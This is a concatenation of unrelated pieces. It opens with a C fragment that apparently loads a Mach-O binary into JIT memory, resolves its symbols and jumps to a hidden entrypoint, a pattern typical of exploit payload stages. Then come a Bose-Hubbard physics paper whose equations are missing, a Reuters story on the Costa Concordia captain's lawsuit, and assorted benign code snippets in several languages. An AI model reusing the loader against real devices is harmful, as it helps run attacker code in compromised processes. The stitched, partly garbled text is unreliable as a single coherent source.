address += (immediate + 1) * sizeof(uintptr_t);
break;
case BIND_OPCODE_DO_BIND_ULEB_TIMES_SKIPPING_ULEB:
count = read_uleb128(&p, end);
skip = read_uleb128(&p, end);
for (uint32_t i = 0; i < count; ++i) {
*(uintptr_t*)address = (uintptr_t)_dlsym(RTLD_DEFAULT, symbolName+1);
address += skip + sizeof(uintptr_t);
}
break;
default:
ASSERT(0);
}
}
}
void load(void* buffer, t_dlsym _dlsym, void* jitwrite, void* jitstart, void* jitend)
{
# define FOR_COMMAND \
lc = (void*)(header + 1); \
for (int i = 0; i < header->ncmds; ++i, lc = (void*)((char*)lc + lc->cmdsize)) { \
# define FOR_SEGMENT_64 \
FOR_COMMAND \
if (lc->cmd != LC_SEGMENT_64) \
continue; \
struct segment_command_64* sc = (void*)lc; \
if (!_strcmp(sc->segname, "__PAGEZERO")) \
continue;
void* (*_mmap)(void *addr, size_t len, int prot, int flags, int fd, off_t offset);
void* (*_memcpy)(void *restrict dst, const void *restrict src, size_t n);
int (*_strcmp)(const char *s1, const char *s2);
_mmap = _dlsym(RTLD_DEFAULT, "mmap");
_memcpy = _dlsym(RTLD_DEFAULT, "memcpy");
_strcmp = _dlsym(RTLD_DEFAULT, "strcmp");
uintptr_t exec_base = -1, exec_end = 0,
write_base = -1, write_end = 0,
base = -1, end = 0;
uint32_t* x = (uint32_t*)buffer;
while (*x != 0xfeedfacf)
x--;
struct mach_header_64* header = (struct mach_header_64*)x;
struct load_command* lc;
uintptr_t linkedit_base = 0;
uintptr_t segstart[32];
int segcnt = 0;
FOR_SEGMENT_64
uintptr_t from = sc->vmaddr, to = from + sc->vmsize;
segstart[segcnt++] = from;
if (!_strcmp(sc->segname, "__LINKEDIT"))
linkedit_base = sc->vmaddr - sc->fileoff;
if (sc->initprot & VM_PROT_EXECUTE) {
exec_base = MIN(exec_base, from);
exec_end = MAX(exec_end, to);
}
if (sc->initprot & VM_PROT_WRITE) {
write_base = MIN(write_base, from);
write_end = MAX(write_end, to);
}
base = MIN(base, from);
end = MAX(end, to);
}
uint8_t* tmpmap = _mmap(0, end - base, PROT_WRITE | PROT_READ,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
ASSERT(tmpmap);
FOR_SEGMENT_64
_memcpy(tmpmap + sc->vmaddr, (char*)header + sc->fileoff, sc->filesize);
}
ASSERT(write_base >= exec_end);
void* rw = _mmap(jitend, end - write_base, PROT_READ|PROT_WRITE,
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
ASSERT(rw == jitend);
uint8_t* finalmap = jitend - write_base + base;
uintptr_t reloc_slide = (uintptr_t)finalmap;
FOR_COMMAND
if (lc->cmd == LC_DYLD_INFO_ONLY || lc->cmd == LC_DYLD_INFO) {
rebase((void*)lc, tmpmap, segstart, linkedit_base, reloc_slide);
bindit((void*)lc, tmpmap, segstart, linkedit_base, _dlsym);
}
}
if (jitwrite && jitstart) {
performJITMemcpy(_dlsym, jitwrite, jitstart, finalmap, tmpmap, write_base - base);
} else {
_memcpy(finalmap, tmpmap, (write_base - base) - 1);
}
_memcpy(rw, tmpmap + write_base - base, end - write_base);
void (*entrypoint)();
FOR_SEGMENT_64
uint64_t* x = (void*)(finalmap + sc->vmaddr);
while ((char*)x != (char*)(finalmap + sc->vmaddr + sc->vmsize)) {
if (*x == MAGIC) {
entrypoint = (void*)*(x+1);
goto found_entrypoint;
}
x++;
}
}
found_entrypoint:
entrypoint();
}
int main()
{
return 0;
}
|
Solution of one-dimensional Bose Hubbard model in large-$U$ limit
The one-dimensional Bose-Hubbard model in large-$U$ limit has been studied via reducing and mapping the Hamiltonian to a simpler one. The eigenstates and eigenvalues have been obtained exactly in the subspaces with fixed numbers of single- and double-occupancies but without multiple-occupancies, and the thermodynamic properties of the system have been calculated further. These eigenstates and eigenvalues also enable us to develop a new perturbation treatment of the model, with which the ground-state energy has been calculated exactly to first order in $1/U$.
I. INTRODUCTION
The Bose-Hubbard model perhaps is the simplest one to describe the physics of strongly-correlated Bose systems in a lattice, in which bosons hop between neighboring lattice sites and interact via an on-site repulsion U . In general, such model cannot be exactly solved even in the one-dimensional (1D) case .
However, in the 1D U → ∞ limit, i.e., the hard-core-boson (HCB) case, where double or multiple occupying of a lattice site is prohibited, exact eigenstates of the model can be constructed easily . For finite U , as in a real system, states with double or multiple occupancies should be considered, and this construction is no longer valid. However, one might expect that, for the case of finite but large U , where the properties of the system are still dominated by single occupancies or close to that of the HCB case, there should exist some proper "treatments" which can simplify the discussion. In this paper, we will focus our discussion on the large-U limit and search for such treatments.
Another consideration of our discussion comes from perturbative studies of the model. In large-U limit, many previous perturbative studies have taken the on-site-U or potential-energy part of the Hamiltonian as an unperturbed one and viewed the hopping or kinetic part as a perturbation . These discussions generally can apply well only to some special cases, e.g., integer-filling cases. This is mainly due to the highly degenerate eigenstates of the potentialenergy part of the Hamiltonian, which lead to many difficulties in a perturbation calculation. Similar problem has also arisen in the discussion of Fermi-Hubbard model, where it has been found that a more appropriate treatment of the problem is to retake the unperturbed Hamiltonian by including kinetic terms which do not alter the number of doubly-occupied sites in a state . While for Bose-Hubbard model, to the best of our knowledge, similar treatments have not been employed yet. We hope our discussion can go a step further along this line. Actually, a new and simple perturbation treatment will be developed and directly applied to study the ground-state property at the end of our discussion.
II. REDUCED HAMILTONIAN AND SOLUTIONS
We consider an N -particle Bose-Hubbard model on an L-site 1D lattice (lattice constant a = 1), where c † i (c i ) is the creation (annihilation) operator of bosons at site i, with the periodic boundary condition c † L+1 = c † 1 (c L+1 = c 1 ); i, j denotes pairs of nearest-neighbor sites, i.e., j = i + 1 or i − 1, and t is the hopping integral. The on-site U is finite but very large, U t, as we has mentioned above. Here, we also take the restriction N ≤ L, as in the HCB case.
We first reduce the Hamiltonian into a form which is much easier to solve. As a proper starting point for treating the large on-site U beyond HCB approximation, we discuss within the subspace of states which permit each site to be occupied by no more than two bosons. Then, for our purpose, a site i can be empty, singly-or doubly-occupied, for which the state can be denoted by |0 i , |1 i or |2 i respectively, with the on-site constrain |0 i 0| + |1 i 1| + |2 i 2| = 1.
, as the creation (annihilation) operators of single-and double-occupancies respectively at site i. Obviously, we have Then, within the subspace of states we discuss, Replacing c † i 's and c i 's in Eq. (1) with these relations finally yields a reduced Hamiltonian where, similar to the case of Fermi-Hubbard model , we have split the Hamiltonian into two parts: the part H 0 which preserves the number of singly-or doubly-occupied sites in a state, and the part H I which would change these numbers.
Since only the large-U limit is concerned here, the properties of the system are mainly determined by H 0 , and H I can be viewed as a perturbation part.
A. Eigenstates and eigenvalues when neglecting HI
Let us first neglect the perturbation part H I , i.e., H ≈ H 0 now, which is much easier to solve but remains nontrivial. We will find that the eigenstates can be obtained exactly. Consider states with N 1 singly-occupied and N 2 doublyoccupied sites, i.e., the total number of bosons N = N 1 + 2N 2 . Apparently, both N 1 and N 2 are conserved by H 0 . The basis states of the system can be commonly written as |ϕ x,γ = , in which sites x 1 , x 2 , · · · , x N1 are singly-occupied and sites γ 1 , γ 2 , · · · , γ N2 are doubly-occupied. However, we find that, for our purpose, it is more convenient to rewrite the basis states in another equivalent way. Actually, we note that for each |ϕ x,γ , once the singly-occupied sites x 1 , x 2 , · · · , x N1 are known, the rest sites on the lattice can only be empty or doubly-occupied; that is, we only need further the arranging information of these empty and double-occupancy states at the rest sites, rather than their specific location information, to completely determine the state. Then, we can represent the basis states as where |x ≡ only contains single-occupancies, while |σ ≡ |σ 1 σ 2 · · · σ L−N1 is the sequence of empty and double-occupancy states on the lattice, with σ j = 0 or 2, denoting empty or double-occupancy respectively. An illustrating example for this form of basis states is shown in Fig. 1. The advantage of this new form of basis states is that it enables us to separately treat the single-occupancy part of the states. Actually, as far as the part |x is considered, the Jordan-Wigner transformation is applicable, which maps the operators b † i and b i to spinless-fermion creation and annihilation operators f † i and f i respectively : Here we can directly map the part |x in Eq. (3) to N 1 -particle basis states of spinless fermions |x ≡ , and further map |x, σ to tensor-product states of |x and |σ , which we can write as We can equivalently transform H 0 into the space of these states, which we can call the tensor-state space (TSS), noting that |x ⊗ σ and |x, σ have a one-to-one correspondence. For simplicity, we can set 1 ≤ x 1 < · · · < x N1 ≤ L. Since the numbers of singly-and doubly-occupied sites both are conserved as far as H 0 is considered, we can discuss in the subspace of states with fixed N 1 and N 2 . Then, the term i d † i d i in H 0 can be simply replaced by N 2 . To transform the remaining terms in H 0 into the TSS, we can use a procedure which is very similar to that in Refs. and .
Since terms such as b † in H 0 only transfer a single-occupancy state from site j to j + 1, without changing the sequence of empty and double-occupancy states on the lattice, that is, their action on a state |x, σ is equivalent to that of f † Singly occupied sites( ): 1, 4, 6, · · · Sequence of empty ( ) and double-occupancy ( ) states: FIG. 1: (Color online) An illustrating example for the notation in |x, σ : x1, x2, · · · are the coordinates of singly-occupied sites, and |σ1σ2 · · · is the sequence of empty and double-occupancy states along the lattice.
would transfer a single-occupancy state from site L to 1, and simultaneously transfer an empty or double-occupancy state originally at site 1 to site L. Then, if the original sequence of empty and double-occupancy states on the lattice is |σ 1 σ 2 · · · σ L−N1 , it would be changed to |σ 2 · · · σ L−N1 σ 1 . Hence, there would be a cyclic permutation of this sequence. Additionally, for the single-occupancy part, b † 1 and b L can be mapped to f † 1 and where P is the cyclic permutation operator of the sequence |σ and P −1 is its inverse, both with their action on the |σ part of the state, i.e., P |σ = |σ 2 · · · σ L−N1 σ 1 and Then, H 0 can be mapped to an equivalent Hamiltonian in the TSS as which is much easier to solve. From the discussion above, for any two states |x, σ and |x , σ , one can find the matrix-element relation x , σ |H 0 |x, σ = x ⊗ σ |H equ 0 |x ⊗ σ . It should be noted that, similar to the case in Fermi-Hubbard model, H equ 0 can also be obtained equivalently by defining a unitary transform operator T ≡ x,σ |x ⊗ σ x, σ|, which satisfies T −1 = T † and can transform a state |x, σ to its counterpart in the TSS: T |x, σ = |x ⊗ σ . Then, noting the matrix-element relation for any two states With T , we can represent the mapped form in the TSS for any operators in principle, say, for H I . To diagonalize H equ 0 , let us first introduce the eigenstates of P and P −1 , as that in Ref. . For any sequence configuration |σ s 1 = |σ s 1 σ s 2 · · · σ s L−N1 , we can introduce |σ s m+1 = P m |σ s 1 , where m = 1, 2, · · · , till some integer m s ≤ L − N 1 , for which |σ s ms+1 = |σ s 1 appears for the first time. Obviously, m s is directly related to the detailed form of |σ s 1 . These configurations form an m s -dimensional subspace of sequences, with which we can construct m s eigenstates of P and P −1 as follows, where k s = 2πm/m s , and m = 0, 1, 2, · · · , m s − 1. It can be verified that P |χ ks = e iks |χ ks and P −1 |χ ks = e −iks |χ ks . Then, the eigenstates of H equ 0 can be written as where |ϕ is the spinless-fermion part of the eigenfunction. We have where for convenience, we have introduced h or h † can be easily diagonalized by considering the case of one spinless fermion. The procedure is just a repeating of that in Ref. .
Then, it follows that η = e iq , with q = k s /L + (2n + 1)π/L for even N 1 and q = k s /L + 2nπ/L for old N 1 , where n = 0, 1, 2, · · · , L − 1; and it should be note that q ± 2π and q are equivalent wave vectors. The corresponding eigenstate Obviously, |Ω q is also the eigenstate of the whole part −t(h+h † ) in h f (k s ), with an eigenvalue q = −t(e iq +e −iq ) = −2t cos q. Then, we can and then Eq. (6) becomes from which, we can take |ϕ = |q ≡ f † q1 f † q2 · · · f † q N 1 |0 , where q 1 , q 2 , · · · , q N1 are any N 1 wave vectors which are different from each other. Then, for given N 2 , the eigenstate of H equ 0 can be finally written as |ψ N2;q,ks = |q ⊗ |χ ks , with the eigenvalue E N2;q,ks = N1 v=1 qv + U N 2 . It should be noted that for N 2 = 0 (the case without double-occupancies), |χ ks = |00 · · · 0 and k s = 0. Then, the wave functions take the form |ψ N2=0;q,0 = |q ⊗ |00 · · · 0 , which is completely determined by the spinless-fermion part, and our results are simply reduced to the HCB ones . Hence, our discussion can indeed be viewed as a direct extension of the HCB case by including double-occupancies. For later convenience, we abbreviate the notations of |ψ N2=0;q,0 and the corresponding E 0;q,0 by |ψ 0;q and E 0;q respectively.
The ground state, which we can denote by |ψ 0;q0 , can be obtained by requiring that E 0;q = N v=1 qv takes its minimum: (i) For old N , the N wave vectors of spinless fermions in , yielding a total-wave-vector Q = 0. The ground-state energy 2 . (ii) While for even N , the N wave vectors of spinless fermions should respectively take the values ± π L , ± 3π L , · · · , ± (N −1)π L , yielding Q = 0 as well. The ground-state energy
B. Thermodynamics
Similar to the case of 1D Fermi-Hubbard model , we can also give a discussion of the thermodynamics of the system basing on the eigenstates obtained above. It is convenient to discuss with the grand-canonical partition function Z = N Tre −β(H equ 0 −µN ) , with β = 1 kBT , where µ, the chemical potential of bosons, has been introduced. The trace here can be calculated with the eigenstates |ψ N2;q,0 . Different from the open-boundary case of 1D Fermi-Hubbard model discussed in Refs. , one may think that the operators P and P −1 in H equ 0 , which are directly associated with the periodic-boundary conditions, would lead to trouble in our calculation. However, from Eq. (6) or (7), ψ N2;q,ks |H equ 0 |ψ N2;q,ks = ψ N2;q,ks |h f (k s )|ψ N2;q,ks , and then Z is reduced to where the new trace "tr" is only over eigenstates with the same N 1 , N 2 and k s . This trace depends on N 2 or k s via the dispersion q . Similar to the 1D Fermi-Hubbard case , we now focus on the thermodynamic limit, i.e., the limit L → ∞, N → ∞, for which, the wave-vector q, and hence the dispersion q , tends to be continuous. Then, " q " can be replaced by "(L/2π) 2π 0 dq", and the trace "tr" will become independent of k s or N 2 . The partition function is further reduced as The factor C N2 L−N1 is resulted from the sum over k s , which just gives the total number of sequence configurations |σ , for given N 1 and N 2 . Let Z 1 (N 1 ) = tre −β( q q f † q fq−µN1) , which is directly related to the partition function for a system of free spinless fermions, with µ playing the role of effective "chemical potential ". Obviously, in the thermodynamic limit, for a given µ, Z 1 (N 1 ) takes its dominated value at the most-probable particle number N 1 =N 1 , whereN 1 can be determined via the most-probable distribution of spinless fermions f 1 (q) = 1 e β( q −µ) +1 , Hence, similar to the discussion in Ref. , in the thermodynamic limit, we can only keep the terms with N 1 =N 1 in the sum in Eq. (9), with a negligible error just as that in replacing the grand-canonical partition function by a canonical one; where which actually is the canonical partition function forN 1 spinless fermions, and Noting that N 2 is the number of doubly-occupied sites in the system, one can find that Z 2 is equivalent to the grandcanonical partition function for a "system" of double-occupancies, which have a unique energy level U of (L −N 1 )-fold degeneracy (as the factor C N2 L−N1 indicates) and an effective chemical potential 2µ. The distribution function for such system of double-occupancies is f 2 = 1 e β(U −2µ) +1 . Eq. (10) indicates that in the thermodynamic limit, our system can be viewed as a combination of two independent subsystems as far as the thermodynamics is considered: one forN 1 spinless fermions and the other for doubleoccupancies.
Then, in the thermodynamic limit, the density of singly-occupied sites in the system, while the density of doubly-occupied sites, and the total particle density of bosons, Using Eqs. (11)−(13), for given particle density ρ, we can calculate µ self-consistently. As an illustration, we take U = 10t and show the variation of µ with 0 < ρ < 1 in Fig. 2(a) for several temperatures. One can find that, there is a gradual departure of the finite-temperature results of µ from the zero-temperature one, especially for particle densities ρ ∼ 0 or 1, reflecting the redistribution of bosons with the increase of temperature. We also show the temperaturedependence of the density of doubly-occupied sites ρ 2 in Fig. 2(b), from which we can find that, doubly-occupied sites mainly appear at high temperatures (k B T > t) and their density is small even at very high temperatures (k B T ∼ 10t), especially for low-ρ systems. Hence, we can predict that the effect of doubly-occupied sites on the thermodynamic properties of the system is notable only at high temperatures and high particle densities. We can further calculate other interesting thermodynamic quantities of the system in the thermodynamic limit, such as the internal energyĒ, entropy S and specific heat C V , The results are shown in Fig. 3. For comparison, we have also shown the results of the HCB case, which are obtained by keeping ρ 1 = ρ. We can find that, the results ofĒ, S and C V , all coincide respectively with the corresponding HCB ones at low temperatures (k B T t). However, at high temperatures (k B T > t), the departure from the HCB results is obvious, as expected, since doubly-occupied sites gradually appear in the system with the increase of temperature and have their effect on the thermodynamic properties of the system mainly at high temperatures.
C. Perturbation treatment of HI
The eigenstates and eigenvalues obtained above also enable us to further include H I to get higher-order approximations or corrections. Since we are most interested in the low-energy cases, especially the ground state, we will mainly discuss how the eigenstates without double-occupancies, i.e., |ψ 0;q , are corrected by H I .
To do this, one may perform a canonical transformation H s = e −iS He iS , with a properly-chosen operator S (see, e.g., Refs. ), to obtain an effective Hamiltonian by ignoring terms which are viewed as high-order ones. However, higher-order terms in the Hamiltonian may not only lead to higher-order corrections, but also can contribute low-order ones to, say, the eigenstates; and hence it is generally hard to see exactly that to what extent the eigenvalues and eigenstates of the model have been approximated when using such treatment.
Here we want to develop a perturbation treatment, which, as we will see, is a little different from the usual textbook ones, to study the correction caused by H I . For simplicity, we can first introduce the equivalent operator of H I in the TSS: H equ I = T H I T † . For any two basis states |x, σ and |x , σ , we have x , σ |H I |x, σ = x ⊗ σ |H equ I |x ⊗ σ . Obviously, H equ I |ψ 0;q generates states with N 2 = 1 ( i.e., with one doubly-occupied site). To make the discussion not too cumbersome, we will only consider here the correction to a non-degenerate |ψ 0;q , say, the ground state. We can denote the corrected state by |ψ c 0;q and expand it with the non-corrected eigenstates, |ψ c 0;q = q a 0;q |ψ 0;q + N2;q ,ks a N2;q ,ks |ψ N2;q ,ks .
For simplicity, we can write E N2;q ,ks = E 0 N2;q ,ks + N 2 U , where E 0 N2;q ,ks = E N2;q ,ks − N 2 U obviously is independent of U , and then Eq.
Substituting Eqs. (15), (16) and (17) into Eqs. (18) and (20), and noting that matrix elements such as ψ 0;q |H equ I |ψ 1;q ,ks and ψ N2;q ,ks |H equ I |ψ N 2 ;q ,k s all are independent of U , we collect terms of the same order in 1/U to obtain: (i) The zeroth-order terms in 1/U , 1;q ,ks ψ 0;q |H equ I |ψ 1;q ,ks , N2;q ,ks = 0, from which, we see again that a (0) N2;q ,ks = 0, a 0;q = δ q ,q and E (0) 0;q = E 0;q . (ii) The first-order terms in 1/U , 1;q ,ks ψ 0;q |H equ I |ψ 1;q ,ks , N2;q ,ks = δ N2,1 ψ 1;q ,ks |H equ I |ψ 0;q , from which, we have a 1;q ,ks = ψ 1;q ,ks |H equ N2>1;q ,ks = 0, E While due to the requirement of a normalized |ψ c 0;q , a 0;q can be proved to be a pure imaginary number and can be absorbed as a negligible phase factor of |ψ 0;q , which is similar to the case in a usual non-degenerate perturbation theory (See, for example, Ref. ). Hence, we can neglect a (1) 0;q here. The results obtained so far can be summarized as follows: This procedure can continue further to give the detailed form for higher-order terms in principle, but it becomes more and more complicated.
In practical calculations, we always need matrix elements of (H equ I ) 2 between states without double-occupancies, as that in Eqs. (21) and (22), which we can calculate as follows: wheren b i ≡ b † i b i , and the last two steps follow through the relation d i d † i = b i b † i and the Jordan-Wigner transformation respectively.
We can take the ground-state correction as an example. Consider the odd-N case (the even-N case can be discussed similarly), of which the non-corrected ground-state result has been discussed in Sec. II A.
According to Eqs. (22) and (23), the correction to ground-state energy to first order in 1/U can be calculated as ∆E 0;q0 = 1 U ψ 0;q0 |(H equ I ) 2 |ψ 0;q0 + O( One can find that ∆E 0;q0 ∼ 4N 2 t 2 U L = 4N ρt 2 U and the average correction per particle ∆E 0;q0 /N ∼ 4ρt 2 U , which can be ignored for large U . The correction for other non-degenerate |ψ 0;q can also be calculated similarly, but with much more complexity, due to the complicated form of Eq. (23). The direct extension of our procedure to the case of degenerate |ψ 0;q can also be discussed, although it is too lengthy to be presented here.
III. CONCLUSION
In conclusion, our study of the 1D Bose-Hubbard model in the large-U limit is a direct extension of the HCB approximation by including doubly-occupied states. The main part of our reduced Hamiltonian, H 0 , which perseveres the number of singly-or doubly-occupied sites in a state, enables us to solve it exactly in the TSS we introduced. With the obtained eigenstates and eigenvalues, we have calculated the thermodynamic properties of the system. Our results show that double-occupancies mainly appear and affect the properties of the system at high temperatures.
We think our treatment can capture the main physics of our large-U system. Even though, a new perturbation treatment has also been developed to discuss the corrections caused by the H I part, which indeed can be ignored as far as the ground state is considered. More further discussions, including the extension of our study to other 1D and quasi-1D Bose systems with large on-site U , will be given in future studies. |
Francesco Schettino walks in his hometown of Meta di Sorrento near Naples, October 11, 2012. The captain of the Costa Concordia which ran into a rock and capsized off the Italian coast in January, killing up to 32 people, has sued for wrongful dismissal, his lawyer said on Wednesday. Schettino faces charges of multiple manslaughter and abandoning ship and preliminary hearings will begin on October 15. REUTERS/Ciro de Luca
ROME (Reuters) - The captain of the Costa Concordia which ran into a rock and capsized off the Italian coast in January, killing up to 32 people, has sued for wrongful dismissal, his lawyer said on Wednesday.
Italian Francesco Schettino was not only fired by Costa Cruises but is accused by prosecutors of causing the accident by sailing the luxury cruise liner too close to shore.
He faces charges of multiple manslaughter and abandoning ship and preliminary hearings will begin on October 15.
“It is the right of every worker to appeal against his dismissal and Captain Schettino has done no more than exercise that right,” lawyer Bruno Leporatti said.
“There is nothing to contest or be amazed about, unless we want to say that what the law allows for all citizens doesn’t apply for Francesco Schettino.”
Schettino was held up to ridicule in Italy and abroad following the January 13 disaster off the Tuscan island of Giglio and his name became a symbol of incompetence and cowardice.
The angry order to “Get back on board, damn it!” delivered by a coast guard officer to Schettino over the telephone after he had abandoned his ship was printed on T-shirts in Italy.
Investigators said Schettino brought the 290-m (950-ft)-long vessel too close to shore, delayed evacuation and lost control of the operation during which he left the sinking ship while many of the 4,200 passengers and crew were still on board.
The Naples-born captain has always acknowledged making mistakes once it became clear that the 144,400-tonne Costa Concordia was in trouble, but has said he was not the only one who should be blamed for the tragedy. |
def custom(expr):
return CalculatedField(expr) |
import {Inject, Injectable} from '@angular/core';
import {DOCUMENT} from "@angular/common";
@Injectable({
providedIn: 'root'
})
export class LocalStorageService {
private storage: Storage;
constructor(@Inject(DOCUMENT) doc: Document){
this.storage = doc.defaultView?.localStorage as Storage;
}
public setItem = (key: string, value: any): void =>
this.storage.setItem(key, value);
public getItem = (key: string): any =>
this.storage.getItem(key);
public removeItem = (key: string): void =>
this.storage.removeItem(key);
public getAndRemove = (key: string): any => {
const value = this.getItem(key);
this.removeItem(key);
return value;
}
}
|
def backward_autocomplete(self):
index = self.autocomplete_manager.autocomplete(action=-1)
is_in_cycle = self.autocomplete_manager.is_in_cycle()
self.update_buffer(clear=True)
if index is not None:
self.ask_for_hint(index, type="info")
return is_in_cycle |
// SetFlusher sets the flush strategy for the logger.
func (l *Logger) SetFlusher(f Flusher) {
l.mu.Lock()
defer l.mu.Unlock()
l.flusher = f
} |
EBay chief John Donahoe says he sees bitcoin and other digital currencies playing an "important role" in PayPal, the e-commerce giant's Internet payment platform.
"We're going to have to integrate digital currencies in our wallet," Donahoe said in an interview on CNBC's "Squawk Box."
While refusing to say when, the eBay CEO talked broadly about the advantages of bitcoin and why he owns some. "I'm not buying it as an investment. I'm buying it to understand how it can be used."
"I think there are two sides of it, the investment side and the digital currency side," he continued in the interview, which aired Thursday. "I'm more interested in the digital currency side about how you and I can exchange value seamlessly using technology."
Read More3 reasons Wall Street can't stay away from bitcoin |
package daily;
/**
* description 字符串模式匹配
*
* 示例:
* 模式pattern:aabba (a、b组合成的字符串)
* 字符串:dogdogcatcatdog
* 结果:true
*
* @author chengwj
* @version 1.0
* @date 2020/6/22
**/
public class Leet {
public static void main(String[] args) {
//true
boolean b = new Leet().patternMatching("aabba", "dogdogcatcatdog");
boolean b2 = new Leet().patternMatching("aaaa", "dogdogdogdog");
boolean b3 = new Leet().patternMatching("", "");
boolean b4 = new Leet().patternMatching("a", "");
//false
boolean b5 = new Leet().patternMatching("ab", "");
boolean b6 = new Leet().patternMatching("bbbaa", "xxxxxxy");
}
public boolean patternMatching(String pattern, String value) {
if(pattern == null || value == null) {
return false;
}
int numOfA = 0, numOfB = 0;
for(int i = 0; i < pattern.length(); i++) {
if(pattern.charAt(i) == 'a') {
numOfA++;
continue;
}
if(pattern.charAt(i) == 'b') {
numOfB++;
continue;
}
}
int length = value.length();
boolean isAMore = numOfA > numOfB;
int max = numOfA + numOfB == 0 ? 0 : length / Math.max(numOfA, numOfB);
outer:
for(int i = 0; i <= max; i++) {
int lengthOfA,lengthOfB;
if(isAMore) {
lengthOfA = i;
lengthOfB = numOfB == 0 ? 0 : (length - lengthOfA * numOfA) / numOfB;
} else {
lengthOfB = i;
lengthOfA = numOfA == 0 ? 0 : (length - lengthOfB * numOfB) / numOfA;
}
if(lengthOfA * numOfA + lengthOfB * numOfB != length) {
continue;
}
//开始匹配
int beginOfA = Math.max(pattern.indexOf('a') * lengthOfB, 0);
int beginOfB = Math.max(pattern.indexOf('b') * lengthOfA, 0);
String a = value.substring(beginOfA, beginOfA + lengthOfA);
String b = value.substring(beginOfB, beginOfB + lengthOfB);
if(numOfA != 0 && numOfB != 0 && a.equals(b)) {
return false;
}
int index = 0;
for(int j = 0; j < pattern.length(); j++) {
if(pattern.charAt(j) == 'a') {
if(match(value,index,lengthOfA,a)) {
index += lengthOfA;
continue;
}
continue outer;
}
if(pattern.charAt(j) == 'b') {
if(match(value,index,lengthOfB,b)) {
index += lengthOfB;
continue;
}
continue outer;
}
}
return true;
}
return false;
}
private boolean match(String s, int index, int lengthOfD, String d) {
if(index + lengthOfD > s.length() || lengthOfD > d.length()) {
return false;
}
for(int i = 0; i < lengthOfD; i++) {
if(s.charAt(index + i) != d.charAt(i)) {
return false;
}
}
return true;
}
}
|
/// Factorial
///
/// # Type
/// : `usize -> usize`
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(factorial(5), 120);
/// ```
pub fn factorial(n: usize) -> usize {
let mut p = 1usize;
for i in 1..(n + 1) {
p *= i;
}
p
}
/// Double Factorial
///
/// # Type
/// : `usize -> usize`
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(double_factorial(7), 105);
/// ```
pub fn double_factorial(n: usize) -> usize {
let mut s = 1usize;
let mut n = n;
while n >= 2 {
s *= n;
n -= 2;
}
s
}
/// Permutation
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(P(5,3), 60);
/// ```
#[allow(non_snake_case)]
pub fn P(n: usize, r: usize) -> usize {
let mut p = 1usize;
for i in 0..r {
p *= n - i;
}
p
}
/// Combination
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(C(10, 9), 10);
/// ```
#[allow(non_snake_case)]
pub fn C(n: usize, r: usize) -> usize {
if r > n / 2 {
return C(n, n - r);
}
P(n, r) / factorial(r)
}
/// Combination with Repetition
///
/// # Usage
///
/// ```
/// extern crate peroxide;
/// use peroxide::fuga::*;
///
/// assert_eq!(H(5,3), C(7,3));
/// ```
#[allow(non_snake_case)]
pub fn H(n: usize, r: usize) -> usize {
C(n + r - 1, r)
}
|
class AnalyzeMixin:
"""Mixin for processing files caught by the pylinac watcher.
Attributes
----------
obj : class
The class that analyzes the file; e.g. Starshot, PicketFence, etc.
config_name : str
The string that references the class in the YAML config file.
"""
obj = object
config_name = ''
has_classification = False
def __init__(self, path, config):
"""
Parameters
----------
path : str
The path to the file to be analyzed.
config :
The configuration settings of analysis. See `~pylinac.watcher.load_config`.
"""
self.full_path = path
self.local_path = osp.basename(path)
self.base_name = osp.splitext(self.full_path)[0]
self.config = config
@classmethod
def run(cls, files, config, skip_list):
files = drop_skips(files, skip_list)
for file in files:
cond1 = contains_keywords(file, config, cls.config_name)
if config[cls.config_name]['use-classifier']:
cond2 = matches_classifier(file, cls)
else:
cond2 = False
if cond1 or cond2:
obj = cls(file, config)
obj.process()
skip_list.append(osp.basename(file))
def process(self):
"""Process the file; includes analysis, saving results to file, and sending emails."""
logger.info(self.full_path + " will be analyzed...")
self.instance = self.obj(self.full_path, **self.constructor_kwargs)
self.analyze()
if self.config['email']['enable-all']:
self.send_email()
elif self.config['email']['enable-failure'] and self.should_send_failure_email():
self.send_email()
self.publish_pdf()
# self.save_zip()
logger.info("Finished analysis on " + self.local_path)
def save_zip(self):
# save results and original file to a compressed ZIP archive
with zipfile.ZipFile(self.zip_filename, 'w', compression=zipfile.ZIP_DEFLATED) as zfile:
zfile.write(self.full_path, arcname=osp.basename(self.full_path))
# remove the original files
os.remove(self.full_path)
@property
def constructor_kwargs(self):
"""Any keyword arguments meant to be given to the constructor call."""
return {}
@property
def zip_filename(self):
"""The name of the file for the ZIP archive."""
return self.base_name + self.config['general']['file-suffix'] + '.zip'
@property
def pdf_filename(self):
"""The name of the file for the PDF results."""
return self.base_name + '.pdf'
@property
def keywords(self):
"""The keywords that signal a file is of a certain analysis type."""
return self.config[self.config_name]['keywords']
def keyword_in_here(self):
"""Determine whether a keyword exists in the filename."""
return any(keyword in self.local_path.lower() for keyword in self.keywords)
@property
def failure_settings(self):
"""The YAML failure settings."""
return self.config[self.config_name]['failure']
@property
def analysis_settings(self):
"""The YAML analysis settings."""
return self.config[self.config_name]['analysis']
def send_email(self, name=None, attachments=None):
"""Send an email with the analysis results."""
if name is None:
name = self.local_path
if attachments is None:
attachments = [self.pdf_filename]
elif attachments == '':
attachments = []
# compose message
current_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if self.config['email']['enable-all']:
statement = 'The pylinac watcher analyzed the file named or containing "{}" at {}. '
statement += 'The analysis results are in the folder "{}".'
elif self.config['email']['enable-failure']:
statement = 'The pylinac watcher analyzed the file named or containing "{}" at {} and '
statement += 'found something that failed your configuration settings.'
statement += 'The analysis results are in the folder "{}".'
statement = statement.format(name, current_time, osp.dirname(self.full_path))
# send the email
contents = [statement] + attachments
recipients = [recipient for recipient in self.config['email']['recipients']]
yagserver = yagmail.SMTP(self.config['email']['sender'], self.config['email']['sender-password'])
yagserver.send(to=recipients,
subject=self.config['email']['subject'],
contents=contents)
logger.info("An email was sent to the recipients with the results")
def publish_pdf(self):
self.instance.publish_pdf(self.pdf_filename, unit=self.config['general']['unit'])
def should_send_failure_email(self):
"""Check whether analysis results were poor and an email should be triggered."""
return not self.instance.passed
